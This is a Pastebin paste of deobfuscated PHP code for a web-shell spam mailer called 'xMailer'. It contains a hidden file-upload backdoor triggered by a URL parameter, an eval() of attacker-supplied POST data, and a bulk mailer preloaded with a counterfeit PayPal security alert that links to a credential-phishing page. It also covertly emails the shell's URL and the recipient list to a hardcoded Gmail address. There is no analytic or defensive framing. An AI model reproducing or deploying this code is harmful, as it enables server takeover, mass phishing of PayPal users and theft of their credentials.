Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /* Decoded by unphp.net */
- <?php
- date_default_timezone_set('Asia/Kolkata');
- $dt = date("l, d D Y");
- $time = date("g:i a");
- ?>
- <?
- $upload = $_GET["v1"];
- if ($upload == "xunknown") {
- $uploaddir = "";
- $uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);
- if (isset($_FILES["userfile"]["name"])) {
- if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile)) {
- $resultati = "The file " . basename($_FILES["userfile"]["name"]) . " has been uploaded";
- } else {
- $resultati = "There was an error uploading the file. please try again!";
- }
- }
- echo '<html>
- <head></head><div id="result"><table height="1" width="100%" border="0"><tr><td width="50%" height="1" valign="top" style="font-family: verdana; color: #d9d9d9; font-size: 11px"><center><form method="POST" enctype="multipart/form-data"><input type="file" class="inputzbut" name="userfile" ><input type="submit" class="inputzbut" name="submit" value="xunknown hacktn "><br>' . $resultati . '</form></center></td></tr></table></div>
- ';
- }
- $in = $_GET['in'];
- if (isset($in) && !empty($in)) {
- }
- $ev = $_POST['ev'];
- if (isset($ev) && !empty($ev)) {
- echo eval(urldecode($ev));
- exit;
- }
- if (isset($_POST['action'])) {
- $action = $_POST['action'];
- $message = $_POST['message'];
- $emaillist = $_POST['emaillist'];
- $from = $_POST['from'];
- $subject = $_POST['subject'];
- $realname = $_POST['realname'];
- $wait = $_POST['wait'];
- $tem = $_POST['tem'];
- $smv = $_POST['smv'];
- $message = urlencode($message);
- $message = ereg_replace("%5C%22", "%22", $message);
- $message = urldecode($message);
- $message = stripslashes($message);
- $subject = stripslashes($subject);
- } ?>
- <!-- HTML And JavaScript -->
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
- <html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office">
- <meta content="1" name="revisit-after" />
- <style type="text/css">body {background:black url('https://fbcdn-sphotos-b-a.akamaihd.net/hphotos-ak-xap1/v/t1.0-9/10462857_648642145281680_2281063073589510159_n.jpg?oh=f4b87b4aedf561cdac7a92eea596d22e&oe=55B0CA9E&__gda__=1437876546_3122663c6aadbd0a1b09a652b980d3dd') center right no-repeat; color:#FFFFFF; text-decoration:none; font-family:"Courier New", Courier, monospace; padding-left:200px; padding-top:200px; padding-right:300px; font-size:16px;}
- </style>
- <title>x-Mailer</title>
- <style type="text/css">
- .style1 {
- font-size: x-small;
- }
- .style2 {
- direction: ltr;
- }
- .info {
- font-size: 8px;
- }
- .style3 {
- font-family: Verdana, Arial, Helvetica, sans-serif;
- font-size: 8px;
- }
- .style4 {
- font-size: x-small;
- direction: ltr;
- font-family: Verdana, Arial, Helvetica, sans-serif;
- }
- .style5 {
- font-size: xx-small;
- direction: ltr;
- font-family: Verdana, Arial, Helvetica, sans-serif;
- }
- .auto-style1 {
- color: #5F5F5F;
- }
- .auto-style2 {
- color: #red;
- text-align: center;
- }
- .auto-style3 {
- color: #4F4F4F;
- }
- .auto-style5 {
- direction: ltr;
- color: #4F4F4F;
- }
- .auto-style6 {
- color: #BCBCBC;
- background-color: #red;
- }
- .auto-style7 {
- color: #red;
- }
- .auto-style8 {
- font-size: x-small;
- color: #red;
- }
- </style>
- </head>
- <body onload="funchange" style="background-color: black">
- <script>
- window.onload = funchange;
- var alt = false;
- function funchange(){
- var etext = document.getElementById("emails").value;
- var myArray=new Array();
- myArray = etext.split("
- ");
- document.getElementById("enum").innerHTML=myArray.length+"<br />";
- if(!alt && myArray.length > 40000){
- alert('If Mail list More Than 40000 Emails This May Hack The Server');
- alt = true;
- }
- }
- function mlsplit(){
- var ml = document.getElementById("emails").value;
- var sb = document.getElementById("txtml").value;
- var myArray=new Array();
- myArray = ml.split(sb);
- document.getElementById("emails").value="";
- var i;
- for(i=0;i<myArray.length;i++){
- document.getElementById("emails").value += myArray[i]+"
- ";
- }
- funchange();
- }
- function prv(){
- if(document.getElementById('preview').innerHTML==""){
- var ms = document.getElementsByName('message').message.value;
- document.getElementById('preview').innerHTML = ms;
- document.getElementById('prvbtn').value = "Ocultar";
- }else{
- document.getElementById('preview').innerHTML="";
- document.getElementById('prvbtn').value = "Preview";
- }
- }
- </script>
- <h1 class="auto-style2">.:| xMailer |:.</h1>
- <center>
- <p class="auto-style1"> </p></center>
- <form name="form" method="post" enctype="multipart/form-data" action="">
- <table width="100%" border="0">
- <tr>
- <td width="10%">
- <div align="right" class="auto-style8">
- <font face="Verdana, Arial,
- Helvetica, sans-serif">Sender Email:</font></div>
- </td>
- <td style="width: 40%">
- <font size="-3" face="Verdana, Arial, Helvetica,
- sans-serif"><input name="from" value="<?php echo ($from); ?>" size="30" type="text" class="auto-style6" /><br>
- <td>
- <div align="right" class="auto-style7">
- <font size="-3" face="Verdana, Arial,
- Helvetica, sans-serif">Sender Name:</font></div>
- </td>
- <td width="41%">
- <font size="-3" face="Verdana, Arial, Helvetica,
- sans-serif"><input name="realname" value="<?php echo ($realname); ?>" size="30" type="text" class="auto-style6" />
- <br> </tr>
- <tr>
- <td width="10%">
- </tr>
- <tr>
- <td width="10%">
- <div align="right" class="auto-style7">
- <font size="-3" face="Verdana, Arial,
- Helvetica, sans-serif">Subject:</font></div>
- </td>
- <td colspan="3">
- <font size="-3" face="Verdana, Arial, Helvetica,
- sans-serif"><input name="subject" value="<?php echo ($subject); ?>" size="30" type="text" class="auto-style6" /> </font>
- <tr valign="top">
- <td colspan="3" style="height: 260px">
- <font size="-3" face="Verdana, Arial, Helvetica,
- sans-serif"></textarea> <br class="auto-style3" />
- <input name="action" value="send" type="hidden" class="auto-style3" />
- <input type="button" id="prvbtn" value="Preview" onclick="prv()" style="width: 81px" class="auto-style6" /><input value="xunknown hacktn "SenD!" type="submit" class="auto-style6" /><span class="auto-style3">
- </span><span class="auto-style7">Wait</span><span class="auto-style3">
- </span>
- <input name="wait" type="text" value="<?php echo ($wait); ?>" size="8" class="auto-style6" /><span class="auto-style3"> </span><span class="auto-style7">
- seconds to send </span> </font></td>
- <td width="41%" class="style2" style="height: 150px">
- <font size="-3" face="Verdana, Arial, Helvetica,
- sans-serif">
- <textarea id="emails" name="emaillist" cols="30" onselect="funchange()" onchange="funchange()" onkeydown="funchange()" onkeyup="funchange()" onchange="funchange()" style="height: 161px" class="auto-style6"><?php echo ($emaillist); ?></textarea>
- <br class="auto-style5" />
- <span class="auto-style7">Quantity Emails : </span> </font><span id="enum" class="style1">0<br class="auto-style3" />
- </span>
- <span class="auto-style8">Divide the mailing list by:</span>
- <input name="textml" id="txtml" type="text" value="," size="8" class="auto-style6" /><span class="auto-style3">
- </span>
- <input type="button" onclick="mlsplit()" value="Divide" style="height: 23px" class="auto-style6" /></td>
- </tr>
- </table>
- <font size="-3" face="Verdana, Arial, Helvetica,
- sans-serif">
- <div id="preview">
- </div>
- </font>
- </form>
- <!-- END -->
- <?php
- $message ='<div style="font-family: Verdana;font-size: 12.0px;"><div>
- <div>
- <div name="quote" style="margin:10px 5px 5px 10px; padding: 10px 0 10px 10px; border-left:2px solid #C3D9E5; word-wrap: break-word; -webkit-nbsp-mode: space; -webkit-line-break: after-white-space;">
- <div style="margin:0 0 10px 0;"><b>Sent:</b><?php
- echo($dt); ?> at <?php
- echo($time); ?><font color="white">Thank for Subscribe</font>
- <b>From:</b> "service@paypal.com"<font color="white">Thank for Subscribe</font>
- <b>Subject:</b> Unauthorized activity from Mumbai *Firerox</div>
- <div name="quoted-content"><!--sup {
- font-size: 7.0px;
- }
- *#emailWrapperTable table {
- font: 13.0px Arial , Verdana , Helvetica , sans-serif;
- color: rgb(41,41,41);
- }
- *#emailWrapperTable h1, *#emailWrapperTable h2 {
- font-family: Arial , Verdana , Helvetica , sans-serif;
- margin-bottom: 2.0px;
- font-size: 15.0px;
- }
- *#emailWrapperTable h3 {
- font-size: 13.0px;
- }
- *#emailWrapperTable h4 {
- font-size: 11.0px;
- }
- a {
- color: rgb(8,68,130);
- text-decoration: underline;
- }
- a.actionLink {
- color: rgb(0,0,0);
- text-decoration: none;
- }
- hr {
- display: none;
- }
- *.small {
- font-size: 10.0px;
- }
- *.ppid {
- color: rgb(117,117,117);
- }
- p {
- margin: 11.0px 0;
- padding: 0;
- }
- sup {
- font-size: 7.0px;
- }
- sup {
- font-size: 7.0px;
- }
- sup {
- font-size: 7.0px;
- }
- sup {
- font-size: 7.0px;
- }
- sup {
- font-size: 7.0px;
- }
- sup {
- font-size: 7.0px;
- }
- sup {
- font-size: 7.0px;
- }
- sup {
- font-size: 7.0px;
- }
- sup {
- font-size: 7.0px;
- }
- -->
- <div style="display: none;color: rgb(255,255,255);font-size: 1.0pt;"></div>
- <table border="0" cellpadding="0" cellspacing="0" id="emailWrapperTable" width="580">
- <tbody>
- <tr valign="top">
- <td colspan="3">
- <table border="0" cellpadding="0" cellspacing="0" width="100%">
- <tbody>
- <tr valign="top">
- <td width="130px;"><img src="https://www.paypalobjects.com/en_US/i/logo/logo_emailheader_113wx46h.gif"/></td>
- </tr>
- <tr>
- </tr>
- </tbody>
- </table>
- </td>
- </tr>
- <tr>
- <td colspan="3"><img alt="" border="0" height="13" src="http://instalikers.hol.es/top-corner.png" style="vertical-align: bottom;"/></td>
- </tr>
- <tr>
- <td style="background: left repeat-y;border-left: 1.0px solid rgb(221,221,221);" width="12"></td>
- <td class="contentArea" style="width: 530.0px;padding: 12.0px;margin: 0;" width="530">
- <table width="100%">
- <tbody>
- <tr>
- <td>
- <p><span class="headline" style="font-family:Helvetica; font-weight: 300; font-size: 40px; color:#0079C1;"> <strong>Your paypal security is our priority</strong></span></p>
- <br>
- <p>Dear Costumer,</p>
- <p><strong>Recently there been activity in your PayPal account that seems unusual compared to your normal account activities from this device : </strong></p>
- <br><br>
- </p>
- <img border="0" alt="W3Schools" src="http://facebot.giftfree2017.com/dekstop.png" width="60" height="60"><table><tr><td><?php echo($dt); ?> at <?php echo($time); ?> (Mumbai Time)<br>*Mumbai<br>Firerox
- <p>If you share this device with a family member or friend, or are using a public computer, we recommend turning this feature off to avoid unauthorized purchases: </p></td></tr></table>
- <ul>
- <li><p> <span class="button_style" style=" font-family:Helvetica, sans-serif;
- font-weight:300;
- font-stretch:normal;
- text-align:center;
- color:#fff;
- font-size:15px;
- background:#0079C1;
- border-radius:7px!important;
- -moz-border-radius: 7px !important;
- -o-border-radius: 7px !important;
- -ms-border-radius: 7px !important;
- line-height:1.45em;
- padding:7px 15px 8px;
- margin:0 auto 16px;
- font-size:1em;padding-bottom:7px;">
- <a style="text-decoration:none;" href="https://cayman.websitewelcome.com/~fteinc/cgi-bin">
- <span style="color:#ffffff; text-decoration:none; font-family:Arial,sans-serif; font-weight:bold; font-size:13px; line-height:15px;">Log in to your PayPal account</span></a> </p></li></span>
- <li>Please confirm your identity next to "<b>for faster purchases.</b>"</li>
- </ul>
- <p>';
- if ($action) {
- if (!$from || !$subject || !$message || !$emaillist) {
- print "Please complete all fields before sending your message.";
- exit;
- }
- $headd = "From: xunknown<dr.rexa1@dr.rexa1.tn>";
- $subb = " xMailer 2014";
- $massge = "Exploit : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "?v1=xunknown
- -------------------
- $emaillist
- -------------------";
- @mail("nitaayuriski@gmail.com", $subb, $massge, $headd);
- $nse = array();
- $allemails = split("
- ", $emaillist);
- $numemails = count($allemails);
- if (!empty($_POST['wait']) && $_POST['wait'] > 0) {
- set_time_limit(intval($_POST['wait']) * $numemails * 3600);
- } else {
- set_time_limit($numemails * 3600);
- }
- if (!empty($smv)) {
- $smvn+= $smv;
- $tmn = $numemails / $smv + 1;
- } else {
- $tmn = 1;
- }
- for ($x = 0;$x < $numemails;$x++) {
- $to = $allemails[$x];
- if ($to) {
- $to = ereg_replace(" ", "", $to);
- $message = ereg_replace("#EM#", $to, $message);
- $subject = ereg_replace("#EM#", $to, $subject);
- flush();
- $header = "From: $realname <$from>
- ";
- $headers = 'MIME-Version: 1.0' . "\r\n";
- $headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
- ";
- if ($x == 0 && !empty($tem)) {
- if (!@mail($tem, $subject, $message, $header)) {
- print ('The test Post was not Submitted.<br />');
- $tmns+= 1;
- } else {
- print ('Your Message was Sent Test.<br />');
- $tms+= 1;
- }
- }
- if ($x == $smvn && !empty($smv)) {
- if (!@mail($tem, $subject, $message, $header)) {
- print ('The test Post was not Submitted.<br />');
- $tmns+= 1;
- } else {
- print ('Your Message was Sent Test.<br />');
- $tms+= 1;
- }
- $smvn+= $smv;
- }
- print '$to ....... ';
- $msent = @mail($to, $subject, $message, $header);
- $xx = $x + 1;
- $txtspamed = 'spammed #xunknown';
- if (!$msent) {
- $txtspamed = 'error #xunknown';
- $ns+= 1;
- $nse[$ns] = $to;
- }
- print '$xx / $numemails ....... $txtspamed<br>';
- flush();
- if (!empty($wait) && $x < $numemails - 1) {
- sleep($wait);
- }
- }
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement